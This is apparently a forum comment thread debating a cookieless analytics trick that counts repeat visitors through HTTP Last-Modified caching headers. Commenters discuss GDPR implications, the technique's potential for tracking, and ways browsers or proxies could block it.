It is not a unique timestamp though. Each day, all visitors start at 00:00:00. All users that visit the site a second time get the timestamp 00:00:01 and so on.
Where are people getting these insane reads of GDPR. Any bit of entropy is not going to violate GDPR. First, an active client-server connection is required for any kind supposed "identity" contained here, which would of course include far more unique bits of identity/entropy, such as IP. Secondly, even if the full DB of page view counts were leaked you could not actually use it to identify a user.
You have somehow perverted GDPR to believe it to mean `no client may ever hold a unique state`. Good luck to anyone making a claim that this is NOT possible in anything but the most rudimentary application.
I agree. Well crafted laws (like the GDPR) forbid any kind of tracking without consent. It’s the what and not the how. It doesn’t matter if it’s via cookies or any other way.
Important to note that privacy laws that regulate tracking are not limited to the Cookie header. They apply to tracking and data collection in general, regardless of how technically clever you make it.
This is part of why I quit my privacy focused analytics start-up years ago. I won’t name it directly, but it was one of the first and is still going strong (although not really open-source anymore).
People kept asking for cookieless tracking but with another way of identifying returning visitors that was always worse from a privacy standpoint. Cookies can be controlled by the client, anything stored on the server can not.
Honestly, cookies are pretty nice, it’s the law around this that sucks. Tricks that attempt to bypass the laws will surely only work for a limited time, at least I hope they will…
Exactly. They could have the same functionality and privacy characteristics if they simply kept a cookie that incremented each time the site was visited. The fact that they didn't go this route suggests this is more about finding a way to track unique visitors when cookies are disabled. They are deliberately subverting the user's desire to not be tracked and spinning it as a privacy win.
If it was about tracking users, wouldn't they generate a unique timestamp per visitor on the first visit? Giving everyone the same timestamp is a terrible way to try and track individuals.
Well, yes you could have a cookie with C=C+1 and carefully set the expiration to the end of the day (like the article), or you could use randomly generated last-modified times and deduplicate server-side (similar to how cookies are usually used), but I can think of a few reasons the cache would give greater precision, so even if a lot of the same things are the same, I'm not so sure it's really "no different"; these things are pretty important to (some) publishers:
- third-party cookie blocking/notification features in browsers
- review processes on ad networks checking for actual cookies rather than suspicious last-modified times
On the other hand, now that we know about it is easy to defeat: a privacy conscious browser will just add a random amount of minutes/seconds in the “if modified since” header. The only risk is you sometimes trigger a reload because the resource was modified in that interval.
Looks like a nice middle ground between no tracking at all and needing all tracking to how well your website perform. Seems no fingerprinting is involved so the website visitor is anonymized. Unlike cookies where we can store whatever we like, this method reveal only the unique visit, and its derivatives.
The missing piece is that no fingerprint is involved. They don't have a way of identifying that user, but they are still able to count the number of times that visitor loads the page. So, it's not a tracker, it's a counter. It's like a loyalty punch card at your local sandwich shop -- they can track how many times you've been there by counting the hole punches, but they don't have a unique identifier, so they can't track details about those visits.
On the other hand, a cookie or a browser fingerprint contains info that can uniquely identify that user so it can be used for tracking.
Fair enough. At least they've told us how it works, so if the data no longer matches that methodology in the future then we can speculate that they've implanted a UID, unless they tell us how it works again and the data is consistent with the new methodology.
Tracking without consent is illegal in Europe, regardless of the method. Alternative tracking methods are not workarounds to get around the law; they are only workarounds in trying not to be caught.
Tracking without consent is illegal. This is a clever way to get absolutely reamed, because you’re not only in breach of data protection laws you’re actively trying to obfuscate it.
Yeah nice try. Law makers are not that stupid. Any way of storing personal data is subject to this regulation.
And before you try the next thing, personal data is everything that can be linked to a specific user, e.g. IP addresses have been ruled to be personal data, some uuid that helps you identify a user as well.
People should really read the law, and/or at least literate commentary on it instead of assuming things or repeating what someone else assumed.
This is definitely not personal data. The piece of information is not linked to an individual and cannot be used to identify an individual (not the same as a 'user'), not least because it is not unique to each visitor: According to the article all first requests get the same 'last-modified' date, same for all second requests, etc.
Still, this stores data in the browser in a way that might be deemed a technology similar to a cookie, and therefore this might still fall within the various cookie laws, but this is completely outside of personal data regs.
That’s pretty clever. I think if you really want to keep it privacy respecting, you should stop counting at 1 - so you can distinguish the first vs subsequent visits, but you can’t tell if someone has visited 2 or 200 times.
I am having trouble understanding how knowing someone has visited three times is more privacy invasive than knowing they visited twice. What is so magical about 3?
Consider that there’s some long tail of visitors who visit many times in one day. Someone is going to be visiting more times than anyone else, whether that’s 10 or 100 or 1000 page views. That person is now uniquely trackable. To avoid that situation you need to stop counting somewhere, and you’re not really getting any new info after 1 (well, 2 I suppose, if you want to track bounces), so you might as well stop there.
I don't agree that the existence of this header makes a user more trackable. You can already uniquely identify visitors with their IP & source port, which is included in every single packet and is way more specific than some timestamp.
Your argument seems to be that this timestamp in the header could possibly be used as a lookup key in a database of visitors. I think that's a stretch, but in any case that database would be the privacy violating thing. This header is completely anonymous.
You’re probably right! But since they aren’t getting any more info by continuing to count after 2, it’s just a liability to do it. After all, the whole point of the setup seems to be to minimize the amount of unique information the system has to process.
what is the problem with letting a website know how many times I have visited the page? How is it better for a website to only know if I have visited earlier or not?
Makes sense. I’m not very experienced in privacy but could you explain why uniquely identifying the user is a problem? As in you can tell that there’s one user who visited 100 times but how can you use that information to correlate with an identity?
It is materially different because it does not track individual users.
It's comparable to dropping the same cookie to every visitor on a particular day; a pretty low level of privacy invasion.
Also, this allows to not use such things as visitor's IP address to collect meaningful statistics, which is a privacy win for the user, and an accuracy win for the site operator.
who says Last-Modified has to be a current date? you've got the potential for 1669827111 users as of when I was composing this comment without giving your users future dates.
There are also many timezones and you can encode information in the timezone indicator as well. Also, you can use different days. You can stretch this number into millions. For a website that gets a certain number of unique visitors per year, this may be unique enough.
Because the cache key for the site is partitioned by top-level origin in modern browsers, they wouldn't get any additional information this way that they couldn't get with existing first-party storage techniques, such as service worker caches, session cookies, IndexedDB, etc. See e.g. https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P... for example. Opening a new incognito window would trivially defeat this method of "tracking". This is basically just a very small first-party-only cookie.
The demo doesn't work in safari on my mac. It sometimes gets to 2, but on refresh goes back to 1. Actually, got it up to 4 one time. Seems like the claims of "Works in any browser and any server" are overstated.
same. I got it up to 8 by clicking into the address bar and hitting enter. However, doing a refresh instead caused it to reset (the browser didn't send the if-modified-since header so the server didn't do it's little trick and instead started over)
The page lastmodified.normally.com claims "Works in any browser or any server". What if the browser has no Javascript engine.
In this case I tried the demo with a browser that has a JS engine, with JS enabled, and the demo still did not work. That is because "ping.withcabin.com" was not disclosed to the user. The OP suggests that users access "lastmodified.normally.com". It says nothing about accessing "ping.withcabin.com". As such, the proxy does not contain any address info for that domain. The user (me) never typed it.
Instead of a browser, I use a localhost-bound forward proxy to control requests and responses, including HTTP headers. The proxy contains all of the domain-to-IP address mappings I need in memory. Why should I add an IP address for "ping.withcabin.com". The request returns no content.
1. For example, something like
acl cabin hdr(host) -m str ping.withcabin.com
http-request del-header If-Modified-Since if cabin
http-response del-header Cache-Control if cabin
http-response del-header Last-Modified if cabin
Hm, on Safari 16.1 it seems reloading twice clears the cache and therefore the counter (but eg cmd-W cmd-Z cmd-R will safely increase it). Either way, I think I would prefer this behaviour to be some sort of cookie that the law okays, because as everyone else has said, I'm quite browsers will fuzz these data.
(I would probably go for a Gaussian fuzzer each visit, just because it adds the off chance that it's quite a way away from any attempted ID, making it a little bit more difficult to cast a wider net and get a few bits of entropy)
Change 'last-modified' to use a secure hash of the contents, like sha256. Then the browser can detect if a website is giving bad hashes, potentially using them for tracking.
ETags can be anything -- they aren't required to be a hash of the content.
Thinking about this problem, why does the browser expose any information about what's in the cache? Client-side JavaScript can't tell what's in the cache because it's an obvious security issue. Why let the server know?
Browsers should ask for the hashes on a list of content without exposing their cache contents. Then the browser can request anything thats changed.
The way If-None-Match is that the browser says "give me the latest if this ETag represents an out-of-date resource, otherwise I'll keep using my copy." It's not clear to me how you're proposing this work instead?
(Also, in many cases the server uses a hash of the inputs to generating the resource, which isn't something externally verifiable)
ETag doesn't have any assurance that it's a hash of the page contents: the current protocol doesn't stop the server from embedding arbitrary information in the ETag, and there's no way for the client to tell.
Neither does Last-Modified, as we just saw. If we were going to alter the meaning of a header for this, it should be ETag. Just agree on ETag formats that browsers can verify are just hashes, and have them throw away any opaque ETags or dates.
You'd need to introduce something new for that. Many servers compute ETags today as hashes of inputs to a process.
(Which is nice computationally, since you can immediately say "not modified" instead of building the response, hashing it, and throwing it away if the hash matches)
Well, I said "just hashes" for sort, but such ETag formats could agree on other algorithms as well, as long as the browser can verify them.
And introducing a new method doesn't solve the issue of deprecating the existing abusable methods, which is why I suggested one that can already be implemented by privacy-first browsers one-sidedly. Servers would then be pressured to migrate to some friendly ETag format if they don't want to completely lose client-side caching for a (hopefully growing) share of their userbase.
> This is great for privacy as we don't need to use cookies, IP addresses, fingerprinting or unique identifiers. In our tests, this method proved durable enough to be the most reliable method of counting unique visitors without using cookies.
The differences with a cookie are that the header is named Last-modified instead of Set-Cookie and Cookie, and the value must be a datetime in the RFC2616 format.
How is it good for privacy? I think it’s worse because it’s invisible for the user. I would bet tracking visitors using such an hack isn’t compatible with GDPR, that requires an informed consent for tracking. And good luck explaining your hack to the average visitor.
You seem to slightly misunderstand how GDPR works. Tracking in and of itself is not the problem, it's personal data and personally identifying data that is. You can count how many hits your server receives no problem, this is roughly the same idea.
This is equivalent to setting a cookie with a hit count. It's still storing & submitting information, it's just not using a unique identifier (Which is pretty privacy-respecting, I'm not saying it's a terrible thing or something).
I assume it will be treated as such, too. If you can use a cookie to do this without consent, this is fine too. If you can't then it's not. The same happens for local/session storage: it's cookie-equivalent.
By that measure, any users behind a unique single IP (no IP pooling, no CGNAT, etc) will always be uniquely identifiable. And for IP there's much fewer steps to personally identify the user. The server necessarily sees the user IP.
Yes, the IP can be used to identify people. If you want to track users using their IP and respect GDPR, you need to get their consent first.
The best is to not store them before you get consent. Having a temporary access log with a few IPs is probably fine. But keeping all your access logs forever for analytics purposes is not fine anymore.
> Natural persons may be associated with online identifiers provided by their devices, applications, tools and protocols, such as internet protocol addresses, cookie identifiers or other identifiers such as radio frequency identification tags. This may leave traces which, in particular when combined with unique identifiers and other information received by the servers, may be used to create profiles of the natural persons and identify them.
Basically the “cookie consent” part in the EU stems from the e-privacy directive. Article 5.3 refers to GDPR (through the directive that is replaced by GDPR) and reads:
Member States shall ensure that the storing of information, or the gaining of access to information already stored, in the terminal equipment of a subscriber or user is only allowed on condition that the subscriber or user concerned has given his or her consent, having been provided with clear and comprehensive information, in accordance with Directive 95/46/EC, inter alia, about the purposes of the processing. This shall not prevent any technical storage or access for the sole purpose of carrying out the transmission of a communication over an electronic communications network, or as strictly necessary in order for the provider of an information society service explicitly requested by the subscriber or user to provide the service.
In short, this method may fall under the EU “cookie law” above. The use of timestamps may require consent if they are used to distinguish users (even if only for counting purposes). The timestamps may then also be personal data under the GDPR.
It should be able to detect that the date is not valid (and that their precision is wrong), and avoid sending a "If-Modified-Since" header. (The same would be true if they were assigned at random rather than sequential like this; it still should be able to detect that they are not valid and have wrong precision.)
What's the reason for not storing a cookie? It's not like browsers that don't support cookies are targeted, right? Cookies can also be "great for privacy", if their power is not abused server-side ...
Time of last access + a counter of your visits once your hits reach N>2 is probably enough to separate an individual from the crowd here, unless your site is tremendously busy.
To be clear, they’re not generating unique headers. They’re setting them to the day start, so they can tell if the requester has already been to the site today or not. It actually seems pretty reasonable.
They way they are using it is providing less information than a UID cookie would, but the same amount of information as a boolean "previously visited" cookie. However, now that the technique is known there is nothing stopping people from using the same method to store a UID date, and privacy protecting clients will have difficulty differentiating between the two, so best to eliminate this as a fingerprinting method altogether.
People keep saying in this thread "there is nothing stopping people from using the same method" to do something else! I think that this is an irrelevant criticism. This is a valid attempt to minimize the amount of information collected on visitors and still providing a unique visitors per day count, and the fact that someone could build a similar but different system that looks like a cookie isn't relevant.
They demonstrated a PoC that uses an HTTP feature in a way it wasn't intended to add entropy to fingerprinting techniques. Discussing how this same exploit could be used maliciously by others and how to prevent that isn't criticism of the PoC, it is standard security practice.
But you can't have as many bits in a UID date as for a generic cookie, and a privacy protecting client could just ignore the ones that don't make sense. Does a 1978 date make sense? Probably not. You could scale this up to the millions, probably, but it won't scale infinitely.
roblox has ~50mm daily users (DAU), and if my math is correct (it probably isn't) you could have hour granularity (only 0-23) timestamps on 6 files, each day, and track 191mm unique users. I used roblox because i knew their DAU off-the-cuff - because roblox requires a login, they know who you are anyhow.
But if you do 1 second granularity a mere 2 cache timestamps are enough to fingerprint everyone on the planet, each day.
There probably is one already: this method is so old that the documentation of privoxy shows[1] how to defeat it. I can confirm it works: their example[2] website says I've visited 61996 times.
Sending a garbage Last-Modified time might confuse the server and cause unpredictable problems for the user. Blocking it is safe because the server will just assume this is the first time the user has visited the website.
This allows site owners get statistics on page views/uniques/bounces without unique identifier cookies or javascript injections.
I’m all for blocking any abusive tracking methods, but this looks to me like creative website statistics that works for single domain. What’s the harm by measuring that?
While this particular implementation doesn't track individuals, couldn't your trivially start tracking individuals by sending them unique random times like last-modified: 12 Mar 1978 12:34:56 GMT thereby giving them a ~30 bit unique identifier for as long as the file is cached?
Only if you disregard the amount of latitude that the semantics of these headers give to UAs that would effectively thwart this method of tracking.
If I fetch your /foo.html today in November 2022, and you send me a last-modified from 1978, that gives me and my UA a huge range from which to select a different datetime (anywhere between the 1978 value and now-ish) on my next request. How are you going to correlate my original and subsequent requests if in the latter I ask if you've got a copy that's been modified since 1999?
Context is important. The replied-to comment starts off, "While this particular implementation doesn't track individuals, couldn't your trivially start tracking individuals by[...]"
An acceptable response, then (to both you and the original commenter), follows: "While some particular browser version doesn't currently protect individuals from that proposed form of tracking, any browser vendor could trivially start thwarting that form of tracking by exploiting the latitude afforded to UAs by the semantics of these headers." And that's the form that the previous comment takes and how it should be understood. The fact that "users go to the web with the browser they've been given [i.e., today, and which isn't providing this sort of tracking protection]" doesn't change anything; we are explicitly talking about steps that each side _can_ take in the arms race related to the subject of this discussion...
Allowing websites to get a somewhat accurate count of visitors plus bounce rate helps them to tell how they’re doing. Hopefully, they use that to guide developing a better product/service.
If you can allow them to do that without getting tracked, it’s win-win. You get a better experience when they build a better service.
I very much prefer this to e.g fingerprinting. This is local to one site and basically uniqueness only rather than an identifying id. I don’t feel “tracked” or “targeted” by this.
> Many privacy-focused analytics services will generate and store a UID on the server instead of saving it in a cookie - based on a hash of your User Agent, IP, Location, Date etc.
What location? The Geolocation API?
What date? How can a date contribute to a UID? Each visitor sends multiple HTTP requests at different dates.
...at the cost of caching (or at least a round trip).
Is it necessary to know how many visits per day a particular user made? If # of unique visitors per day/week/whatever is sufficiently granular you could retain a corresponding cache window.
Also if this is to avoid those cookie warnings that got popular after GDPR, it should be noted you're still storing information on users' computers. i.e. The stuffed metadata is not so different in principle from a cookie. In this case it seems innocuous, but I wouldn't be surprised to see sites exploit your trick to store a unique last-modified date for each user as a method of tracking (if that's not already commonplace).
The number of unique visits in a day is the number of total visits minus the number of repeat visits from the same users, so they need something like this to get an accurate count. You can't produce the number without information on repeat visitors.
I think you are right that this technique could be changed and turned into a way to track individual users. But as implemented, it doesn't do that, and all knowledge is lost after one day. We shouldn't criticize people who are trying to limit the information they collect to the bare minimum by pointing out an altered version of their system might have undesirable properties.
Then the server doesn't need to know about repeat-visits that don't hit it, and it would be nice to maintain caching support if the page content is static.
If it’s anonymous and doesn’t collect any user data, why do we need it at all? Would using a cookie for the same purpose (just a counter of visits, resetting every day) trigger the GDPR laws somehow? It would work in literally same way except being transparent to the user instead of utilizing some shady technique.
I guess according to GDPR this counts as tracking nontheless. GDPR does not specifically mention cookies or anything technical. An identifier is enough (does not have to be a uuid). IP, location, browser etc already counts. This probably would count as storing something like a cookie on the client.
If a web server wanted to track you, they would just use your IP. This is a clever technical trick to count your number of users without collecting any personal data. I don't understand why that is such a bad thing?